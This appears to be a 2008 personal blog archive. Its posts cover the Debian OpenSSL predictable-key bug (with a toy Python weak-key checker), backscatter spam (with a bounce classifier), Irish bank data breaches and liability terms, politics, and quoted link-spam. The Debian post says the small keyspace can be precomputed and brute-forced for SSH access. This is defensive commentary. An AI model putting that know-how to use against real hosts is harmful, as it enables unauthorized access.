Valgrind was warning about uninitialized data in the buffer passed into ssleay_rand_bytes, which was causing all kinds of problems using Valgrind. Now, instead of just fixing that one use, for some reason, the Debian maintainers decided to also comment out the entropy mixed in from the buffer passed into ssleay_rand_add. This is the very data that is supposed to be used to seed the random number generator; this is the actual data that is being used to provide real randomness as a seed for the pseudo-random number generator. This means that pretty much all data generated by the random number generator from that point forward is trivially predictable. I have no idea why this line was commented out; perhaps someone, somewhere, was calling it with uninitialized data, though all of the uses I've found were with initialized data taken from an appropriate entropy pool.

So, any data generated by the pseudo-random number generator since this patch should be considered suspect. This includes any private keys generated using OpenSSH on affected Debian systems. It also includes the symmetric keys that are actually used for the bulk of the encryption.

A pretty major fuck-up, all told.

Update 3: Here's a how-to page on wiki.debian.org put together by the folks from the #debian IRC channel. It has how-to information on testing your keys for vulnerability using a script called 'dowkd.pl', details of exactly what packages and keys are vulnerable, and instructions on how to regenerate keys in each of the (many) affected apps.

It notes this about Apache2 SSL keys:

According to folks in #debian-security, if you have generated an SSL key (normally the step just prior to generating the CSR, and then sending it off to your SSL certificate provider), then the certificate should be considered vulnerable.

So, bad news -- SSL keys will need to be regenerated. Add 'costly' to the list of downsides. (Yet another update: this hasn't turned out quite that badly after all -- many CAs are now offering free reissuance of affected certs.)

Looking at 'dowkd.pl', it gets even worse for ssh users. It appears the OpenSSH packages on affected Debian systems could generate only 1 of 262148 distinct keypairs. Obviously, this is trivial to brute-force. With a little precomputation (which would only take 14 hours on a single desktop!), an attacker can generate all of those keypairs, and write a pretty competent SSH worm. :(

Update: voila, precomputed keypairs, and figures on the viability of remote brute-forcing the keyspace in 11 minutes.
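Why a weak-key checker can be exhaustive, as a toy model added here for illustration (this is not dowkd.pl or OpenSSL code): once the entropy-mixing step is gone, the process ID is the only input that varies, so every possible key can be listed in advance and each authorized_keys entry checked against that list. The "key" below is just a hash of the seed inputs, an assumption standing in for real key generation and covering a single key type, size and architecture; `toy_key_blob`, `build_blacklist` and `audit_authorized_keys` are hypothetical names, and the sample entries are constructed.

```python
import base64
import hashlib
import os

PID_MAX = 32768                      # the "32k" PID range quoted earlier on this page
KEY_TYPES = ("ssh-rsa", "ssh-dss")


def toy_key_blob(pid, entropy=b""):
    """Toy stand-in for key generation: the blob is a hash of the PRNG seed inputs.

    A healthy generator mixes in `entropy`; with that step removed it is always
    empty and the PID is the only thing that changes between runs.
    """
    return hashlib.sha256(pid.to_bytes(4, "big") + entropy).digest()


def fingerprint(blob):
    """Colon-separated MD5 of the decoded key blob (legacy OpenSSH fingerprint form)."""
    digest = hashlib.md5(blob, usedforsecurity=False).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, 32, 2))


def build_blacklist():
    """Fingerprint of every blob the weakened toy generator can emit: one per PID."""
    return {fingerprint(toy_key_blob(pid)) for pid in range(1, PID_MAX + 1)}


def audit_authorized_keys(text, blacklist):
    """Return (line_no, comment, fingerprint) for each entry whose key is blacklisted."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue
        # An entry may start with an options field (from="..."), so locate the key type.
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        try:
            blob = base64.b64decode(fields[idx + 1], validate=True)
        except ValueError:
            continue  # malformed base64; a production audit would report this entry
        fp = fingerprint(blob)
        if fp in blacklist:
            hits.append((line_no, " ".join(fields[idx + 2:]), fp))
    return hits


def sample_authorized_keys():
    """Constructed file: one entry from the weakened generator, one from a healthy one."""
    weak = base64.b64encode(toy_key_blob(pid=4242)).decode()
    good = base64.b64encode(toy_key_blob(pid=4242, entropy=os.urandom(32))).decode()
    return (
        "# constructed sample, toy blobs rather than real keys\n"
        f"ssh-rsa {weak} alice@etch-box\n"
        f'from="192.0.2.0/24" ssh-rsa {good} bob@fixed-box\n'
    )


if __name__ == "__main__":
    blacklist = build_blacklist()
    print(len(blacklist), "possible weak keys")
    for hit in audit_authorized_keys(sample_authorized_keys(), blacklist):
        print("weak key on line %d (%s): %s" % hit)
```

The same PID (4242) yields a flagged key without the entropy input and an unflagged one with it, which is the whole of the bug in miniature.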

Full-text RSS bookmarklet

This site offers a nifty utility for dealing with those annoying sites which offer only partial text content in their RSS and Atom feeds.

Given an RSS or Atom feed's URL, the CGI will iterate through the posts in the feed, scrape the full text of each post from its HTML page, and re-generate a new RSS feed containing the full text.

The one thing it's missing is a one-click bookmarklet version. So here it is:

Full-text RSS Bookmarklet

Drag that to your bookmarks menu, and next time you're looking at a partial-text feed, click the bookmark to transform the viewed page into the full-text version. Enjoy!

Guinness in Ireland dodges a bullet

Phew! The rumours were untrue. Diageo will not be closing down the Guinness brewery in Dublin 8, and will continue brewing the black stuff in Dublin 8, thankfully:

Diageo is to close its breweries at Kilkenny and Dundalk, significantly reduce its brewing capacity at St James's Gate and build a new brewery on the outskirts of Dublin under a plan announced today.

The company said it would invest EUR 650 million (£520 million) between 2009 and 2013 in the restructuring.

The renovation of the St James's Gate brewing operations is expected to cost around EUR 70 million and will see the volume of Guinness brewed there fall from around one billion pints a year, to just over 500 million.

This plant will serve the Irish and British markets and will be based on the Thomas St side of the site. The company said this would ensure that every pint of Guinness sold in Ireland would be brewed here. Approximately half of the 55 acre site will then be sold once the five-year project is complete.

Around 65 staff will remain in brewing operations at St James's Gate with about 100 others due to transfer to the new Dublin plant. Although the company has yet to announce the exact location of its new brewery, the company says it will have a capacity of around nine million hectolitres, or around three times that of the refurbished St James's Gate site. This new brewery will produce Guinness for export and ales and lagers for the Irish market.

Diageo said when the two Dublin breweries are fully operational in five years time it will transfer brewing out of the Kilkenny and Dundalk breweries and close these plants. This move will result in 'a net reduction in staff of around 250', the company said.

The company employs 800 people in its brewing operation and a total of 2,500 in the Republic and Northern Ireland.

Diageo said these two plants "do not have the scale necessary for sustained success in increasingly competitive market conditions".

The company said it would offer those employees relocation opportunities where possible. Those for whom relocation is not possible will be offered "a severance package alongside career counselling".

Operations at its Waterford brewery will be "streamlined" as part of the re-organisation leading to "some reduction in output". The current workforce of 27 in Waterford would be reduced to 'around 18' but Diageo was unable to confirm the extent of the output reduction.

The company says the St James's Gate site it proposes to sell and the Kilkenny and Dundalk sites have an estimated value of EUR 510 million.

The Guinness Storehouse, which receives around 900,000 visitors a year, will continue to be based at St. James's Gate.

The company estimates it will incur one-off costs of EUR 152 million during the restructuring and says this would be treated as an exceptional cost in the fiscal year ending in June 2008.

Paul Walsh, chief executive of Diageo said: 'Over the last twelve months we have conducted a rigorous review of our brewing operations in Ireland. It examined many options and I believe it has identified the right formula for the long-term success of our business in Ireland and for the continued global success of the Guinness brand.'

"Our ambition is to combine the most modern brewing standards with almost 300 years of brewing tradition, craft and heritage."

Guinness has been brewed at St James's Gate for almost 250 years. Guinness extract produced at the Dublin site is exported to more than 45 countries.

the Lisbon Treaty and Libertas’ astroturf

So, Irish voters will soon be voting in a state-wide referendum on the upcoming Treaty of Lisbon -- the latest set of amendments to how the European Union is run.

Since ratification will require changes to the Irish constitution, we get to vote on these intricacies where most EU inhabitants do not. Unfortunately this means it's not particularly "sexy" -- it's a pretty obtuse and boring set of issues, and deciding which way to vote is not easy, with such snore-worthy stuff at stake.

One of the organisations campaigning for a "no" vote in the referendum is called Libertas. Aileen forwarded on a very interesting article by Chekov Feeney on Indymedia Ireland about them, which is well worth a read if you're interested in Irish politics and the international reach of US lobbying. Here's some snippets:

Declan Ganley, president of Libertas, happens to be president of Rivada Networks, a US defence contractor (they supply emergency communications networks to the US intelligence community).

[...]

On Sunday April 20th, Libertas announced that Ulick McEvaddy was "joining the No To Lisbon Campaign" and publicised the event with a photo-opportunity of the two 'entrepreneurs' in front of the Libertas Campaign bus. McEvaddy is the first member of the Irish business and political elite to join the Libertas campaign since it emerged under the stewardship of Declan Ganley.

What's particularly interesting about this is that McEvaddy is the CEO of Omega Air, a US defence contractor (they supply cargo planes and inflight refuelling services to the US military). [...] According to the [ US Air Force's Integrator Magazine ], "industry insiders say [McEvaddy's] company has even approached U.S. intelligence agencies about tanking services for detainee transfers, to reduce dependence on foreign air fields." In other words, offering to provide inflight refuelling services to rendition flights so that they wouldn't have to stop over at foreign airports such as Shannon on their way to "interrogate" suspects. A very accommodating offer indeed.

McEvaddy was also the figure who got himself appointed to the board of Knock airport with a view to opening it up to US military flights.

Nice guys, then.

The article goes on, and on, and on, detailing some shady transactions involving these guys and their US military/intelligence connections, the "astroturf" nature of the Libertas organisation, and the odd behaviour of the Libertas campaign in general.

It comes to this conclusion:

This article has examined the reality behind the Libertas campaign, the connections of its two high-profile backers, the implausibility of its message, the peculiar nature of its campaign and some of the underlying strategic differences at play. The conclusion is that the evidence suggests that Libertas is most likely to serve primarily as a vehicle for advancing US strategic interests.

Check it out -- it's a must-read.

BoI data breach: a sample customer notification

More on the Bank of Ireland 30,000-customer data breach (which is up to 31,500 people by now) -- BoI promised to contact the "affected" customers by post, warning them that their data had been leaked. If you were wondering what those letters might look like, wonder no more. Here's one, via a friend who found himself in this unenviable position:

So it's not just name, date of birth, and address -- he notes that they've leaked 'information on the current account I use to pay for the policy.'

Interestingly, he says that his life assurance policy was set up directly with their life assurance department, not via the local branch -- which directly contradicts what BoI say on their website:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches: [... list of branches omitted...]

The update from 28 April doesn't clarify this, either. Hmm.

Google Webmaster Tools now includes ‘goog-love.pl’

Back in 2006, I wrote a script I called "goog-love.pl"; it used Google's now-dead SOAP search API (thanks, Nelson!) to figure out which Google queries your web site was "winning" on. Unfortunately, Google shut down new signups for the SOAP interface later that year.

I was just looking through Google's Webmaster Tools page for taint.org, when I came across the Statistics / Top search queries page:


This is exactly what goog-love.pl produced. hooray!

Bank of Ireland: “we don’t understand fraud”

Check out this logic from the Bank of Ireland, spotted by waider in today's news:

Last week, the bank said that medical records, bank account details, names, addresses and dates of birth of 10,000 customers were on the laptops. [...]

Bank of Ireland said an assessment had concluded that the risk of fraud arising from the thefts was 'very low', as the data on the laptops did not include bank account passwords, PINs or copies of signatures.

So a fraudster would have medical records, bank account details, names, addresses and dates of birth of 10,000 customers, but the risk of fraud is 'very low'? Incredible.

Update: make that 30,000 customers.

Update 2: 31,500 customers, and a sample letter.

Merry Spamiversary

Peter G. Neumann at the RISKS Forum notes that last Friday was the anniversary of the sending of the first e-mail spam:

[Thanks to Mike Hogsett for noting this event, and Brad Templeton for recording it.]

What is allegedly the very first spam message was sent roughly 30 years over the ARPANET.

In seeing this, Mike was amused because he works with some of the people it was addressed to, of whom a few are still at SRI: NEUMANN@SRI-KA, GARVEY@SRI-KL, MABREY@SRI-KL, WALDINGER@SRI-KL and some of whom are retired: ENGELBART@SRI-KL, NIELSON@SRI-KL, GOLDBERG@SRI-KL (I am always amused when some of these old ARPANET addresses show up in today's incarnations of spam.)

Also somewhat before Mike's time, Geoff Goodfellow, Eric Kunzelman, Dan Lynch, and many others at SRI were instrumental in the evolution of the ARPANET.

Also included in the enormous enumerated TO: list (historically interesting in itself by not having been suppressed!) are Bill English (who was the catalyst for much of Doug Engelbart's innovations being transitioned from SRI to PARC), Dave Farber, Irv Jacobs, Bob Metcalfe, Jon Postel (who by then had moved from SRI to ISI), three Sutherlands, and Lauren Weinstein, to name just a few.

Happy Birthday, Spam! Sorry I cannot wish you many happy returns.

What’s on this site, April 2008 edition

It's been a while since I've listed the various sub-sites of taint.org in one post. I've just updated the taint.org wiki's index page to include them, so might as well list them here, too:

Enjoy!

Bank of Ireland’s 10,000-customer security breach

Bank of Ireland, one of Ireland's biggest high-street banks, was the subject of a breach notification yesterday -- 4 laptops, containing unencrypted "sensitive personal information" about up to 10,000 customers, were stolen between June and October 2007. It seems the Irish Data Protection Commissioner was not informed until last Friday. The Financial Regulator is also looking into the incidents.

According to the Independent, the laptops 'were being used by staff working for Bank of Ireland's life assurance division. They contained the information about medical history, life assurance details, bank account details, names and addresses.'

This breach has raised quite a few issues.

First off, I was watching Questions and Answers last night, and was shocked by the naivete of the assembled panel. One panelist, for example, reckoned that common criminals wouldn't understand the value of this data -- so it was probably nothing to worry about!

There was absolutely no concept of how widespread identity theft has become -- using stolen identity information to apply for credit cards is part of Petty Theft 101 these days, since filling out forms is a lot easier than breaking and entering, obviously. There was also no appreciation of how little protection Irish consumers have in this regard with current Irish banking T&Cs.

According to previous research, about 2% of accounts compromised in data breaches become victim to identity theft.

Some comments from the bank from those articles:

'The data was not encrypted, although it is understood there was software security installed on the stolen computers.'

Doubtless, "software security" refers to some kind of useless Maginot Line boondoggle like Norton Internet Security. This would have absolutely no useful effect in this case. The only useful way to protect customer data on a stolen laptop is to use encrypted storage.

'In the interim the bank has monitored all of these customer accounts and can confirm that there has been no evidence of fraudulent or suspicious activity.'

This is a fallacy. This data provides plenty of information regarding the customer's identity -- information which is useful to receive loans and credit fraudulently, elsewhere. Monitoring the bank's accounts is of no help in that case. On top of that, identity information like your date of birth, mother's maiden name, health status, and so on doesn't expire -- that info will still be useful for identity theft, 10 years from now, or as a stepping-stone to further fraud.

As John O'Shea noted on Twitter earlier, there was nothing on their website about it this morning; there is now, however -- a broken link on the front page. oops!

Figuring out the puzzle and fixing the URL's errors gets you to this page, which notes:

The laptops contained information relating to some customers who either obtained a quote or took out a Life Assurance policy with Bank of Ireland Life from the following branches:

  • Drogheda
  • Dunleer
  • Bagnelstown
  • Court Place Carlow
  • Stephens Green
  • Tallaght
  • Montrose

Anybody who is not a customer of these branches is not affected by this incident.

As far as I can make out, the bank didn't issue this breach notification. It appears from the coverage that this information was first announced by Data Protection Commissioner Billy Hawkes to RTE yesterday, leaving the bank apparently scrambling to catch up:

"The thefts of the laptops were only brought to the attention of the appropriate authorities in the bank in the past number of weeks," Bank of Ireland said in a statement that offered no other explanation for the long delay.

It would have been so much better if BoI had been proactive with breach notification -- examples from overseas have illustrated its value. As Adam Shostack has noted repeatedly over the past few years: the rules have changed.

As for repercussions for BoI, it'll be interesting to see if anything happens. For "live" customer data on up to 10,000 customers to be stored, in unencrypted form, on a laptop is terrible security practice -- but as far as I know, there are no laws or regulations requiring anything better in Ireland, unfortunately. :( However:

Consideration will be given as to what further action will be sought from Bank of Ireland to ensure that the obligations contained in the Data Protection Acts in this area are met.

On a broader level, this issue serves to highlight once again the absolute necessity for all organisations in the public and private sector to take their data protection responsibilities seriously. In particular, all organisations should be assessing immediately the necessity for storing personal data on laptops. If a need is found, appropriate security measures such as encryption should be put in place immediately.

Go Billy! ;)

The best thing to come out of Caerphilly

Caerphilly is a small commuter town in South Wales, notable mainly for Caerphilly cheese and a castle.

Well, you can add one more thing to that list; its inhabitants also provided some key data in a major health study, from which emerged one great finding -- it turns out that if you're male, sex twice a week reduces the risk of death from heart disease by about half:

Men who said they had sex twice a week had a risk of dying half that of the less passionate participants who said they had sex once a month, Dr. Davey-Smith's team said.

No other risk factor showed a statistically significant link to the frequency of orgasm.

The authors said that they had tried to adjust the study's design to account for a factor that might explain the findings -- that healthier, fitter men with more healthy life styles engaged in more sex. Even so, they could not explain the differences in risk. Hormonal effects on the body resulting from frequent sex could be among other possible explanations for the findings, Dr. Davey-Smith said.

Here's the science bit, via the BMJ -- a paper entitled 'Sex and death: are they related? Findings from the Caerphilly cohort study':

Result: Mortality risk was 50% lower in the group with high orgasmic frequency than in the group with low orgasmic frequency, with evidence of a dose-response relation across the groups. Age adjusted odds ratio for all cause mortality was 2.0 for the group with low frequency of orgasm (95% confidence interval 1.1 to 3.5, test for trend P=0.02). With adjustment for risk factors this became 1.9 (1.0 to 3.4, test for trend P=0.04). Death from coronary heart disease and from other causes showed similar associations with frequency of orgasm, although the gradient was most marked for deaths from coronary heart disease. Analysed in terms of actual frequency of orgasm, the odds ratio for total mortality associated with an increase in 100 orgasms per year was 0.64 (0.44 to 0.95).

Conclusion: Sexual activity seems to have a protective effect on men's health.

The perfect excuse ;) Thanks, Caerphilly!

My commute vs Jaffa Cakes

Last weekend, I picked up a super-cheap cycling computer in Aldi for 20 Euros. I cycle to work, and I thought it'd be fun to get some geeky number-crunching in on my daily commute.

Here are the figures for my trip into work:

  • Ride time: 12:16
  • Trip distance: 2.4 miles
  • Avg speed: 12.7 MPH
  • Max speed: 22.4 MPH
  • Total KCal work performed: 136
  • Max pulse rate: 146

Given that there are 46 kilocalories in a Jaffa Cake, 136 KCal means that every day, I can eat 3 Jaffa Cakes with impunity. Result! ;)

Also: some relevant commentary from Penny Arcade.

Google Calendar ‘Quick Add’ smart keyword bookmark

Google Calendar has a nifty feature, "Quick Add", where you can enter a natural-language string like "lunch with Justin, 1pm 20/4/08", it parses it, and adds an appointment to your calendar. However, the link in the Calendar UI can't be bookmarked; you have to go to the Calendar page, wait for it to sloooowly load all its AJAX bits, hit the link, and only then type the appointment details, by which time I've forgotten it anyway ADD-style. ;)

Elias Torrez came up with a Firefox extension to use the Quick Add feature in one keypress, but in my opinion that's overkill -- I don't want the overhead of another extension, the upgrade worries, and I don't want it using up a keyboard shortcut either. I'd prefer to just have this as a Firefox Smart Keyword -- and thankfully the trick is in the comments for his blog post, from someone called Bjorn. So here's the deal:

Name: Google Calendar Quick Add

Location: http://www.google.com/calendar/event?ctext=+%s+&action=TEMPLATE&pprop=HowCreated%3AQUICKADD

Keyword: newcal

Description: add a new event in Google Calendar

enjoy!

Downloadable movies and the DVP5960

So Mulley mentions that Moviestar.ie are planning to offer downloadable movies. Great concept, but I can guarantee the execution will be crap on a stick. :(

First off, the content available:

'When the service goes live on 1 May, customers will be able to avail of content from several Irish producers including Network Ireland Television, as well as Video International’s film library which includes films like The Little Shop of Horrors. The company is also seeking content from both the History and Biography Channels, which would mean a substantial back catalogue of documentary shows.'

Sorry, but: snore.

Secondly, the technology used:

'Moviestar.ie content must be downloaded onto a PC or laptop but can then be transferred over to digital media players like the iPod Touch for viewing on the go. This service will be compatible with Apple Macs but only if the user downloads Windows Media Player.'

So in other words, it's Windows Media. That means it won't play on my TV through my MythTV box, on a USB stick plugged into a Philips DVD player, on my Linux laptop, or even on a normal DVD player using a burned DVD.

Too little, too late. Plenty of Irish consumers are already consuming downloaded video -- as the popularity of the Philips DVP5960 demonstrates. For legal video downloads to work, they need to be somewhere remotely near as convenient and usable as BitTorrent.

Using DRM is just falling down the same rabbit hole that swallowed up downloadable music for 5 years. Nobody used that either, until gradually the companies involved realised that opening up was the only way to get customers, bringing us to where we are today -- legal downloads using the MP3 format.

BTW, I know that's the same DRM technology used by Channel 4's "4oD" download service. Big deal -- I don't bother trying to watch that stuff either, for the same reasons. If Channel 4 jumped off a cliff, would Moviestar.ie jump after them?


(By the way, that Philips DVD player is a total success story. That's a name-brand hardware manufacturer, making a low-end, $60 DVD player, with support for viewing downloaded XviD AVI movies on a USB stick. Apparently it'll also play off USB hard disks, too. It's immensely popular; for example, here's a customer review of 10/10: "Best thing ever". Several of my friends have them, and praise them highly. I'm coming up to DVD player replacement time, and I'm planning to get one too.)

Backscatter rising

Recently, more and more people have been complaining about backscatter; its levels seem to have increased over the past few weeks.

If you're unfamiliar with the terminology -- backscatter is mail you didn't ask to receive, generated by legitimate, non-spam-sending systems in response to spam. Here are some examples, courtesy of Al Iverson:

  • Misdirected bounces from spam runs, from mail servers who "accept then bounce" instead of rejecting mail during the SMTP transaction.
  • Misdirected virus/worm "OMG your mail was infected!" email notifications from virus scanners.
  • Misdirected "please confirm your subscription" requests from mailing lists that allow email-based signup requests.
  • Out of office or vacation autoreplies and autoresponders.
  • Challenge requests from "Challenge/Response" anti-spam software. Maybe C/R software works great for you, but it generates significant backscatter to people you don't know.

It used to be OK to send some of these types of mail -- but no longer. Nowadays, due to the rise in backscatter caused by spammer/malware abuse, it is no longer considered good practice to "accept then bounce" mail from an SMTP session, or in any other way respond by mail to an unauthorized address of the mail's senders.

Backscatter as spam delivery mechanism

I would hazard a guess that this rise is due to one of the major spam-sending botnets adopting the use of "real" sender addresses rather than randomly-generated fake ones, probably in order to evade broken-by-design Sender-Address Verification filters.

There's an alternate theory that spammers use backscatter as a means of spam delivery -- intending for the mails to bounce, in effect using the bounce as the spam delivery mechanism. Symantec's most recent "State of Spam" report in particular highlights this.

I don't buy it, however. Compare their own example message -- here's what the mail originally sent by the spammer to the bouncer, rendered:

[Image: the spammer's original message, rendered]

And here's what it looks like once it passes through the bouncer's mail system:

[Image: the same message after passing through the bouncer's mail system]

That's simply unreadable. There's absolutely no way for a targeted end user to read the "payload" there...

Getting rid of it

I haven't run into this recent spike in backscatter at all, myself, since I have a working setup that deals with it. This blog post describes it. If you're using Postfix and SpamAssassin, it would be well worth taking a look; if you're just using SpamAssassin and not Postfix, you should still try using the Virus Bounce Ruleset to rid yourself of various forms of unwanted bounce message.

Note that you need to set the 'whitelist_bounce_relays' setting to use the ruleset, otherwise its rules will not fire.

SPF

There's a theory that setting SPF records (or other sender-auth mechanisms like DomainKeys or DKIM) on your domains will reduce the amount of backscatter sent to your domains. Again, I doubt it.

Backscatter is being sent by old, legacy mail systems. These systems aren't configured to take SPF into account either. When they're eventually updated, it's likely they'll be fixed to simply not send "accept then bounce" responses after the SMTP transaction has completed. It's unlikely that a system will be fixed to take SPF into account, but not fixed to stop sending backscatter noise.

It's good advice to use these records anyway, but don't do it because you want to stop backscatter.

What about my own bounces?

You might be worried that the SpamAssassin VBounce ruleset will block bounces sent in response to your own mail. As long as the error conditions are flagged during the SMTP transaction (as they should be nowadays), and you've specified your own mailserver(s) in 'whitelist_bounce_relays', you're fine.
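To make the 'whitelist_bounce_relays' idea concrete, here's an added example in Python (not SpamAssassin's code, and not part of the original post): a bounce is kept only if the returned original carries a Received header naming one of your own outbound relays. The host names and sample messages are constructed, and the bounce test (DSN content type, null Return-Path, or a MAILER-DAEMON sender) is an assumption of this example rather than the VBounce ruleset's own rules.

```python
import email
import re

# Assumption: hosts your own outbound mail leaves through (constructed names),
# i.e. what you would list in 'whitelist_bounce_relays'.
OWN_RELAYS = {"mx1.example.org", "smtp-out.example.org"}

# A Received: header plus its folded continuation lines.
RECEIVED_RE = re.compile(r"^Received:[ \t]*(.*(?:\n[ \t]+.*)*)", re.M | re.I)
# Host names following "from" / "by" inside one Received: header.
HOST_RE = re.compile(r"\b(?:from|by)\s+([A-Za-z0-9.-]+)", re.I)


def is_bounce(msg):
    """Heuristic bounce test: DSN report, null envelope sender, or daemon From."""
    if msg.get_content_type() == "multipart/report":
        return True
    if (msg.get("Return-Path") or "").strip() == "<>":
        return True
    return "mailer-daemon" in (msg.get("From") or "").lower()


def relays_in_returned_mail(raw):
    """Hosts named in Received: headers of the *returned* message only.

    The bounce's own top-level headers are skipped: they always name your
    inbound server, so matching them would rescue every bounce.
    """
    _, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    hosts = set()
    for m in RECEIVED_RE.finditer(body):
        hosts.update(h.lower().rstrip(".") for h in HOST_RE.findall(m.group(1)))
    return hosts


def classify(raw, own_relays=OWN_RELAYS):
    msg = email.message_from_string(raw)
    if not is_bounce(msg):
        return "not-a-bounce"
    if not own_relays:
        # Mirrors the note above: without the relay list nothing can be decided.
        return "unclassified-bounce"
    if relays_in_returned_mail(raw) & {r.lower() for r in own_relays}:
        return "bounce-of-own-mail"
    return "backscatter"


# --- constructed sample messages -------------------------------------------
OWN_BOUNCE = """\
Return-Path: <>
Received: from mail.remote.test by mx1.example.org; Mon, 7 Apr 2008 10:00:05 +0100
From: MAILER-DAEMON@mail.remote.test
To: jm@example.org
Subject: Undelivered Mail Returned to Sender
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status; boundary="b1"

--b1
Content-Type: text/plain

Your message could not be delivered.

--b1
Content-Type: message/rfc822

Received: from laptop.example.org (laptop.example.org [192.0.2.5])
\tby smtp-out.example.org with ESMTP id 1234; Mon, 7 Apr 2008 10:00:00 +0100
From: jm@example.org
To: nobody@remote.test
Subject: lunch?

1pm?
--b1--
"""

BACKSCATTER = """\
Return-Path: <>
Received: from mail.remote.test by mx1.example.org; Mon, 7 Apr 2008 11:00:05 +0100
From: MAILER-DAEMON@mail.remote.test
To: jm@example.org
Subject: Undelivered Mail Returned to Sender

The following message could not be delivered:

Received: from dsl-host.botnet.test ([203.0.113.77])
\tby mail.remote.test with SMTP; Mon, 7 Apr 2008 11:00:00 +0100
From: jm@example.org
To: nobody@remote.test
Subject: cheap pills
"""

NORMAL = """\
Return-Path: <friend@remote.test>
From: friend@remote.test
To: jm@example.org
Subject: hello

Hi!
"""

if __name__ == "__main__":
    for name, raw in [("own", OWN_BOUNCE), ("spam", BACKSCATTER), ("normal", NORMAL)]:
        print(name, "->", classify(raw))
```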

Liability for internet banking fraud in Ireland

Steven Murdoch at Light Blue Touchpaper notes that the UK banking code now includes wording to make the customer liable for losses attributable to them "acting without reasonable care", where "reasonable care" bizarrely includes installing anti-virus software on their PCs.

The Register also picked up on this, as did Brian Krebs in the Washington Post, comparing it with the vastly superior customer protection offered by the US banks.

I was curious, so I went looking at the Irish situation. Needless to say, it's not pretty.

I couldn't find anything in the Irish Banking Federation's Code Of Practice for Personal Customers, unfortunately. However, AIB's terms and conditions for use of their Internet Banking product contain this:

5 Transactions on the Account:

5.1 The User authorises AIB to act upon any instruction to debit an Account received through AIB Phone & Internet Banking which has been transmitted using all or part of the Registration Number, PAC and/or any other authentication process which AIB may require to be used in connection with AIB Phone & Internet Banking (including but not limited to a Code Card) without requiring AIB to make any further authentication or enquiry, and all such debits shall constitute a liability of the User. Where the User's Account is maintained in joint names the liability of the Account Holders shall be joint and several.

5.6 Entries in an Account in respect of Bill Payments, Fund Transfers and Top-Ups shall be prima facie evidence that the transfer or debit represented thereby has been duly authorised and shall be binding on AIB and the User unless and until proved to the contrary.

6 International Payments:

6.9 To the extent permitted by law, and notwithstanding anything to the contrary herein, AIB shall not be liable for, and shall be indemnified in full by the User against, any loss, damage or other liability that the User or AIB may suffer arising out of or in connection with the User’s use of the International Payment services (whether as the sender or receiver of an International Payment) unless such loss, damage or liability is caused by AIB’s fraud, wilful default or negligence. In no circumstances will AIB be liable for any increased costs or expenses, or for any loss of profit, business, contracts, revenues or anticipated savings or for any special, indirect or consequential damage of any nature whatever.

As far as I can tell, basically the AIB have no liability here at all -- if a bad guy gets hold of your PIN code and account number, and empties your account, tough luck.

What about Bank of Ireland? It seems they agreed to refund phishing losses in an incident back in 2006. But their 365online Terms and Conditions now say this:

13 Indemnity

13.2 Without prejudice to the generality of Clause 13.1 above, the Bank shall have no liability whatsoever in respect of any loss suffered by the Customer as a result of their breach of Clause 4 [jm: Security/Authentication] by way of knowingly, negligently or recklessly disclosing the Security Devices or any of them.

So it's all pretty bad news for Irish banking customers -- it's only a matter of time before Irish banks are targeted by a new Banking Trojan, and given that antivirus software has an 80% miss rate these days, even having an up-to-date AV scanner isn't going to be much help.

My answer? Don't do internet banking on Windows machines. Simple as that.

IIA’s nasty infection

The Irish Internet Association have a weblog at blog.iia.ie. Back on January 30, this had a Technorati rank of 587893, with 21 inbound links from 14 blogs. That's about what you'd expect -- comparable with Chris Horn's blog, for instance.

However, fast forward to today, and in the intervening 3 months, it seems to have suddenly shot up to 23,322 inbound links from 550 blogs, giving it a Technorati rank of 6,870.

To put that in perspective, that puts it comfortably in the top 3 in the Irish Blogs Technorati Top 100 -- beating Damien Mulley's 7,859, but just short of Donncha O'Caoimh's stellar 3,434 -- and ahead of these other gods of the Irish blogosphere:

Pretty impressive ;)

I was curious, so I went investigating. Of those thousands of inbound links, here's some samples of the most recent, pasted from the Technorati inbound links page:

barkingmoose

Atacand Free instant online credit report Application credit card Cheap Paxil Does your credit score Household bank credit card application Apr for credit cards Buy Cephalexin? Aciphex Cheap Feldene Zovirax Risperdal Buy Naprosyn, Propecia Credit score codes Poor credit score, Propecia Uk Canada credit card online application Motrin Business credit score Cheap Cialis Jelly 50 Cent Free Ringtones Celexa How to improve my credit score Buy Inderal

4 days ago in barkingmoose by barkingmoose · Authority: 3

The Peninsula's Edge

Jc penny credit card application Credit cards 1.99 apr ny Affect credit score For credit score American express credit card application Freee credit report Instant fleet 0 apr credit card application? Hydrocodone For low credit scores, No credit instant approval credit cards Annual creditreport.com, Tramadol Credit reporting service Configuration VPN Cheap credit reports. Buy Premarin Carisoprodol Soma Propecia Generic

6 days ago in The Peninsula's Edge by ricsmith510 · Authority: 9

The Incredible Blog

Prepaid credit card uk Phentrimine Cheap Zovirax: Calan Highest credit score Ambien Valtrex: Ultram 3 credit reporting agencies Credit cards online application Instant approval student credit cards, Apr balance transfer credit cards Free government credit report Transunion free credit report Credit card debt bankruptcy? Propecia Propecia Uk! Correcting credit reports Cialis Uk Credit rating report Buy Synthroid Instant capital one 0 interest credit card application

7 days ago in The Incredible Blog · Authority: 1

Quilters' Blogs

Annualcreditreport Instantly instant free online credit report Credit cards instant approval Guaranteed instant approval credit cards Lexapro Get my credit score, Card consolidation credit debt financial internet Chevron credit card services. Risperdal Lower credit card debt VPN connection One credit card application Xanax Viagra! Vasotec Diazepam Fix my credit report Credit report bureau. Cialis Soft Tabs! Ativan? Secured loans to increase credit score Cheap Amaryl Cheap Prednisone Alprazolam! Cheap

7 days ago in Quilters' Blogs · Authority: 5

TPN :: Martial Arts Explorer

Luvox Credit score of Plavix 50 Cent Free Ringtones, Cheap Elavil? Free consumer credit report: Famvir Improve credit score fast Phentermine Online Zovirax Cialis Soft Tabs Apr for credit cards! Ultram Zoloft Credit card deal 0 Deltasone! VPN: Cheap Cardura Credit score rankings! Annual credit report .com Interest rate credit score: Carisoprodol Flagyl ER Online Cialis Soft Tabs Enable VPN 0 apr credit card application Free business credit report Ambien Low

7 days ago in TPN :: Martial Arts Explorer · Authority: 56

Take a look at the 'inbound links' list -- thousands more just like that.

